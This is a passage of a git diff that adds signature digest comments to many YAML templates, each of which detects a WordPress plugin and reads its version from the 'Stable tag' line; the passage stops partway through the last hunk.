a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220705b9093b2017a9af23da8617a758b360d678ef51d3bd35913697366b1694ceb02204ba1bfac56c6f5cc75148b9897245e7ed6ec2aefa913917aa6a3edfa96aa1b81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..c52753d22e 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ae2bc78d244be52017ad7137a1b81b7838e85ad100e5623fd02b3f8cbbca7580022027cd197ca863fb5e3ad578b41569c0f5e940f9a18b889da2dc9bcb6f06998551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..20c14c7a0b 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022070f19aeb76e9623840029649bbe504cae0c08e89e67cd7c23f70722ed90b6897022100fef2b8b0b93e6bf53504eb351a589998a45ed0d8feb31467c0f2ef56361f64a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..a442ea32b1 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c76b626075ddb1aa0f1958432e4efebefcaae1267e8aa119fee82c7220524b220221008d455c95cb09fd17fa29dcd804657629d53ade97c025ff61bbbb8c07a1c77556:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..797a4a4105 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207f5851e4498584213f395f64e114768369b16acb35071a2875335fb51aebcc20022035e33d8f06b8bdf04a3a50d938eec8fe9b2330e72edd4fa7c4c7d9f1e4cf3889:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..345487e6e2 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100846568c40b5a25a1d97399d4908c6a5ace47c85431fcd618d5ff85b206ae93e9022035b230c191e52c57ae7028ae267d802097bb94fb3aa7b37a64f7808e37ebfcbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..19e07a678a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009d099936e9a333d08e20de939bd6531ec4a9bf42953046436b2fd95eacd48e88022100f8cd1bfd5afc7efce88e1ac8d3210fd6beafebd17a0ee4e45ee9e9e40a1af5ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..ce699fc38f 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220072174ee0d553fc4b70532993474789ff41df804d164f746ef8b1102844849d8022100c90f50a0af20a91add560f8f713cc59a1f09fbdc42fe22d255c7327c278ad7bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..9c854494a1 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220638fc1288467e3f170391fa19da26c7264123b48ac3f208bce077a6fe3e44510022100d91f865bcdce25cb6f0c822171dd316492012a42362f70235e9f154bace7c5ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..a350f0ebc4 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100841f681d9fbd42069541b04d7e35e3bbc705aa91d300cef0e037f7019e53eb6202203812fc70809bb1591839fbe7f78c46f1ba882b661ebf008d8a81eca0b51faf2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c20ed6552a..67ae0a1e45 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bb9add2d651daedd4c2817808a4d66248d9e3b63d087fb9935522e3810b8a14202204ef4709b593ebeeeb13cd8c7419a8eb1a43090cd4711ba9868cef3423572422a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..aa8e8d5d22 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022052693691571ab61504bec4c11626476e291b4849d0dfb97b31413cf2e6a975aa022077b6557e40dab91d6682566816584b40b03e49661ea15dffb48e7a3dd7b40c47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..338f37c8b3 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200f1001e0f736f4810018b2737e643147ac9becc3a6ee5fdaa4c732d075f1411702206c40809cb038da09a88151d0e62927cbf54a50e5318c9aadf7471b5da29312a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..e7184a67cb 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022010877633f7a3cb98e079b0f33d815dfab53df5c674c9990b22942951999b209e022027e43b39e949ee46126a16adb06dc7e104c064d007704588233ebf0a8c3fe3eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 38391bd9f3..78a443c3ea 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210099413e35b2c882638d5a2732e55309fed0441854d2b5de4b163c361c30b08541022056c0bba1aced749b8622d22b34d3414d65974cdac6a19132caa5a0b401827e7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..eca1785033 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022019b1e85478c19bf47cc3945a937fec4c80014a1f5d7314d7d6e9b7c410c6f9a002202b9d70f9f9c83b068bd1fe7a237b4426a0fca6ad1db61cd9b0e6c17191cebf2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..a2dd81a20d 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c9338329706cadf099748129ad697df66462a51e454dcb19ad79194c3fa2c762022100b5fcea7227d34e835bcad0fa6645df100f3ff36cd32cadc4e58a624d2eac21c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..b350b3d618 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022034ac97eb9923fe6382588ea430ea08c28699b6dda8042d2a2310c08f4a4b60fd022040de8d23a6e8bd017d55792e051d2b6932c5d97a8df8ead41356b2d2831bf177:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..04f2c5920a 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022059cadb14db8a1dc9e7b663f76fb4ec06795760921be435f3a494d0c9440bc2a202201f5746d3fd70262e01f5665a6bb72798dfb678b112a983f0d8f014d41847cef6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..85cbd76c19 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fb861b5428d56f5ddcd23398103632a4e2d0e93a9b08344b332945b13c9ae8a602201a666140eaae25ca407e19dffc8caef599b81d5d285d1a28760cfa8b57524b44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 3e1e79e004..b329ed7191 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210092d4dfd5246015a4c9604830c00d88c8fee5c8670254c41f23dab2423df30a2602204066011cd3311a98bb0de45e9737424a049ab811d394cc3ac2bba4351ade1fdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..4d021745fa 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201f9d73d8d6a08c891e34eda2c54c7ed86c7060dd3cfb6e89644c22a0f70a5bec022016354d4cdafc837aafcdfbfd743f00c3902699c657823452428c3d15985a7ea9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..1ef3246b0f 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207f0078f8efcc619f8720d48392966fa3f2ea96033ca064aae611bef5492d98df0221008b1b57234284d24a333d3e260289e546468d87a0408424d9724f205cc0e42565:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..352c6a5e95 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ec5e95f5cf5ed4102bc8b0476d678e555c94c407bb87635fd084be1dabd5cdd2022100bf1ca1a593d6dfc1bf65bc0e3274a058c961a91e78299d526754184fbf9a56e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..074aa25a65 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200bc223bc73ea2fcce34726fb5e0bea9c59728906f6a9c37536f836fdbff48bf3022100df078ddb49070fe44b465c0ed5c59ce63fe7974452ef0299d0c5e2b8d761ac1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..7fea731597 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100efe950bfef18bbcfa4e6cbf99441b5642027941d0cfacc481c6a0a616d7d2d75022100aad3e82d30ca8da62bdb23e5a01f2935e8637f19f8b1b173409edf97b1c4f2fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..7fe8a668f6 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022014123483287b6510307828dd29da46399b7a9a798d91711da0fdb178636058260220690b5cf1747f8fea89fa3b242072429c118b6b36cc1780ba3c29a6a8e8b1b8a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..2abdbb1d6a 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ae0142362306739e15d34d1f302323278b65ba1bd354c735a211c8cd6adde044022100f76d43ac1ec626fd1820ca948e8eba5f69f5b459ba6a11c79dd72c15ad42d03e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..72dac64826 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022028440cef992874c4e9acd909962d91d6c0e20a477af02d1f7a44d72f6d336072022059ca8285e9852c86189503ac697d440df5811fb3eaf789ab3f84ffd8a8b902f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..7ae043ec5a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022054087f013f1f6bb9110aae3c67bd67b7e79c8ce5da9e8d88b9fea49332b7b90e0220593257fd3d92d195b424a9985633c9c9ba171ef878f5db979eecb53b1f04490a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..3a53c16c89 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a86fab14323e2aeb0ab1fd7149428657b2ada4f6f2310618b5df5cb31957a0920221008004b86e7e0d9a62e082151b1384af7682e40f58f76dae5943b611988fbba179:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..13b8036d57 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fb3c17ce20946ff4a16c0067e25b96a30ba8aba1a11e1d6c202a60cac1809a51022057ad86bde36a2a6a02cf16137797c1d4dbb4197d3a7402efc416dc9b433d5c33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index e83e8d79e7..bc4c015b47 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044021f4c557d838a5988d9fbcc69efb429478e9cce9f070a202505c6d6c3943dc39e022100d37feb77492bb30cda1beb5a93c566a4394cc4660a228ccee4c253d14f04966c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..85ae54323d 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022070d705b83eb007993fa0a671ee32e0a03eead594c0ee55e3df98c4ac4f18313002201ccc0cde95eea9984e5b2b9e27dd413546de5c45b83b67a73c499e18b9895c99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..44c7dfd1e5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220056a4659f318a06b150d4b84ef5dff4985a306e757c87495e70ee864943f99e9022100b7a9034d914671f35ca4261e8d48f9f4a67c215992bf832e520c7c7b5458ccd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..b7ceecfcfe 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b904ad18a5ef06df81024b3d88af290c3edf360835008401602bafc493ee5e03022100a2e0edf9d64f84a648c54a2120ddf0f0cd9c184a0b21aaa4ee4ec7d3b2d4cca2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..be5496d842 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201e142d49316c14584390347cb692f71805d992716be572b5feb3767de94df59e02207c883b9616bcb91beae2c3fcb6812a490dd54f0d5228b480546448c2c0b2b671:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..6b340a86cc 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204a774ef2331e84def1e6de0bb7336f73ee7fdf79d8860be3f2a6726a3aa0069302206ef2de763b3809f1f82af5de0aab0560e42aca8f763a20aaa2d3b33116bab7cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..0cb10cf616 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022073162e0e6ed34ca86a02eaf2723ce804062ac57898c4ed49fa80524bb0dbbaa60221008a325da0599b51fc7b77bf65f078551ad8ecd17b20df24c7cf3a58db15362d63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..8f84c6a559 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201fccf016cb32c285053889bcb93ef4b1c382f47ab72b9854c5eb829216f891ad02210099a1b5f34c60ed3f66bc0a53dc399ef44cc633c8ad5cb116577bdecc4c8cac70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..c2ff07853f 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f01bcd64dafaa658ace18a1fa4dbb59569fe93dfdba25a7945ff3fa5be5f576e022100dfb63f3c40a69b00abaa75877e0f910e1210e69ebf546aecf928c6229649ba74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..971b1f28e3 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203d852e59a63282fea41af66921860f506f12d7ad295f655a1308641ca49a6cdf0221009cc17e4ec2720c66d3e825a84d4096f6a27c319fe83c736bb34d26cbfa2c3647:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..8acf48d0a8 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022004670eecfea03a21db1ec67d31cac48bcc8e55b8dbcb752d6b08f001ce12799402203d3f76c704ab1d344f93838aa336a7da932087dc1406ecffcc177b7ffaf7f747:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..2c01e5d7a4 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d2aa9267b45c5bc783b90d2a1e35da981a9d3fefe0fbff9b3bf54b8a3596cfb0022100d314e6fafeac9e1751f73d60a4f0d428ac284196a758f62223aa4fb8d26d424b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..70f311ed2f 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009c049e82cf56f513238401ab77d37323abd1c337f1753f2225bdb0e8f9f3578802200e6851db7cf7838c1b89f82cbf4c0940c83c5115e8b1572e36890acc7bef534f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..956d67923b 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ccac19831ff5b80aee3617738d54e5e9290a0c698e9d142482627ffab7035798022100a8090404eda40a716428d533652fcf53655fbcfd5260164852705272d4958a2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..fa0f899a06 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 